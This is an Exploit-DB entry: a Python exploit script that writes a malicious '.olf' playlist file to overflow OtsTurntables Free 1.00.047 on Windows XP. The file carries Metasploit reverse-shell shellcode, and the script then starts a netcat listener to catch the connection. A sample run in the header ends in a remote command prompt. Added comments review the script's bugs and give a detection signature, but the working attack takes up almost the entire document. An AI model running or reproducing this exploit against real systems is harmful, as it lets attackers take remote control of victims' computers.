OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow

EDB-ID:

11475

CVE:

N/A

Author:

mr_me

Type:

local

Platform:

Windows

Published:

2010-02-16

#!/usr/bin/python
# 
# ###################################################################
#
# OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Date: 14-01-2010
# Author: mr_me
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on:  Windows XP sp3
# Greetz: corelanc0d3r/jacky/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz 
# bad chars: '\x00\x0a\xbd\x0d\x20'
#
# 		** For educational purposes only **
#
# ####################################################################
#
#		~! I want to go back to the matrix !~
#
# mrme@backtrack:~$ ./0wnm3.py 4444 awsome-electro.olf
#
# [+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit
# [+] Creating exploit file..
# [+] Writing 15000 bytes to awsome-electro.olf.. ph33r
# [+] Send awsome-electro.olf to your target
# [+] Waiting for a shell on port: 4444
# listening on [any] 4444 ...
# 192.168.2.19: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.19] 2624
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\OtsLabs\Lists>
#

import sys, os

def banner():
	"""Write the ASCII-art banner and the tool title to stdout, one line each."""
	art = (
		r"|------------------------------------------------------------------|",
		r"|                         __               __                      |",
		r"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |",
		r"|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |",
		r"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |",
		r"| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |",
		r"|                                                                  |",
		r"|-------------------------------------------------[ EIP Hunters ]--|",
		"[+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit",
	)
	# Raw strings keep the backslashes of the art literal; one write per
	# line, newline-terminated, matches a series of print statements.
	for line in art:
		sys.stdout.write(line + "\n")

# Both positional arguments are required: <port> <filename>.
# With fewer than two, show the banner and usage and exit non-zero.
if len(sys.argv) <= 2:
	banner()
	sys.stdout.write("[?] Usage: " + sys.argv[0] + " <port> <filename>\n")
	sys.exit(1)

# Module globals used by the rest of the script; both are taken verbatim
# from the command line (no validation is performed here).
port, filename = sys.argv[1], sys.argv[2]

# windows/shell_reverse_tcp - 310 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
 
# Opaque payload blob. The only facts recorded about it are in the
# generator comment above (tool, encoder, size, LHOST/LPORT); nothing in
# this script inspects or validates its contents or length.
# NOTE(review): LHOST/LPORT are baked into these bytes at generation time,
# so the <port> argument given to this script must agree with them --
# the script does not check that.
shell = ("\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x47\x4b"
"\x25\x9a\x83\xeb\xfc\xe2\xf4\xbb\x21\xce\xd7\xaf\xb2\xda\x65"
"\xb8\x2b\xae\xf6\x63\x6f\xae\xdf\x7b\xc0\x59\x9f\x3f\x4a\xca"
"\x11\x08\x53\xae\xc5\x67\x4a\xce\xd3\xcc\x7f\xae\x9b\xa9\x7a"
"\xe5\x03\xeb\xcf\xe5\xee\x40\x8a\xef\x97\x46\x89\xce\x6e\x7c"
"\x1f\x01\xb2\x32\xae\xae\xc5\x63\x4a\xce\xfc\xcc\x47\x6e\x11"
"\x18\x57\x24\x71\x44\x67\xae\x13\x2b\x6f\x39\xfb\x84\x7a\xfe"
"\xfe\xcc\x08\x15\x11\x07\x47\xae\xea\x5b\xe6\xae\xda\x4f\x15"
"\x4d\x14\x09\x45\xc9\xca\xb8\x9d\x43\xc9\x21\x23\x16\xa8\x2f"
"\x3c\x56\xa8\x18\x1f\xda\x4a\x2f\x80\xc8\x66\x7c\x1b\xda\x4c"
"\x18\xc2\xc0\xfc\xc6\xa6\x2d\x98\x12\x21\x27\x65\x97\x23\xfc"
"\x93\xb2\xe6\x72\x65\x91\x18\x76\xc9\x14\x08\x76\xd9\x14\xb4"
"\xf5\xf2\x87\xe3\x27\x90\x21\x23\x34\xc6\x21\x18\xac\x7b\xd2"
"\x23\xc9\x63\xed\x2b\x72\x65\x91\x21\x35\xcb\x12\xb4\xf5\xfc"
"\x2d\x2f\x43\xf2\x24\x26\x4f\xca\x1e\x62\xe9\x13\xa0\x21\x61"
"\x13\xa5\x7a\xe5\x69\xed\xde\xac\x67\xb9\x09\x08\x64\x05\x67"
"\xa8\xe0\x7f\xe0\x8e\x31\x2f\x39\xdb\x29\x51\xb4\x50\xb2\xb8"
"\x9d\x7e\xcd\x15\x1a\x74\xcb\x2d\x4a\x74\xcb\x12\x1a\xda\x4a"
"\x2f\xe6\xfc\x9f\x89\x18\xda\x4c\x2d\xb4\xda\xad\xb8\x9b\x4d"
"\x7d\x3e\x8d\x5c\x65\x32\x4f\xda\x4c\xb8\x3c\xd9\x65\x97\x23"
"\xd5\x10\x43\x14\x76\x65\x91\xb4\xf5\x9a");

# Malformed .olf body: a fixed-size 15000-byte buffer assembled as
# 900 filler bytes, an 8-byte stub (the second 4 bytes annotated by the
# author as a CALL DWORD PTR SS:[ESP+2c] address), 30 NOPs, the payload,
# and filler up to exactly 15000 bytes. The offsets are hard-coded for the
# version/platform named in the header and are not checked here.
# NOTE(review): the final padding count is 15000 - len(exploit) with no
# guard; if the preceding parts ever exceed 15000 bytes the multiplier goes
# negative, yields an empty string, and the file silently ends up shorter
# than 15000 bytes.
# Detection note: a 15000-byte .olf whose first 900 bytes are all 0x41 is
# a cheap, high-precision content signature for files built by this script.
exploit = "\x41" * 900
exploit += "\xeb\x06\x90\x90"
exploit += "\x46\x79\x23\x01" # CALL DWORD PTR SS:[ESP+2c] 
exploit += "\x90" * 30
exploit += shell
exploit += "\x41" * (15000-len(exploit))

banner()
try:
	# Everything in this block sits under one bare `except:` below, so any
	# exception at all -- including SystemExit and KeyboardInterrupt --
	# is reported as a permissions problem, and the real cause is lost.
	print "[+] Creating exploit file.."
	print "[+] Writing",len(exploit),"bytes to " + filename + ".. ph33r"
	print "[+] Send " + filename + " to your target" 
	# Opened in text mode ('w'); the handle is closed explicitly rather
	# than via a `with` block, so an exception in write() leaks it.
	turntable = open(filename,'w');
	turntable.write(exploit);
	turntable.close();
	print "[+] Waiting for a shell on port: " + port
	# `port` comes verbatim from argv and is concatenated into a shell
	# command string (no quoting, no integer check). os.system() does not
	# raise when the command fails or `nc` is missing -- it returns an exit
	# status, which is discarded here -- so such failures never reach the
	# except branch.
	os.system('nc -lvp ' + port) 
except:
	# Bare except: see the note at the top of the try block; the message is
	# accurate only for the open()/write() permission case.
	print "[-] Error: You do not have correct permissions.."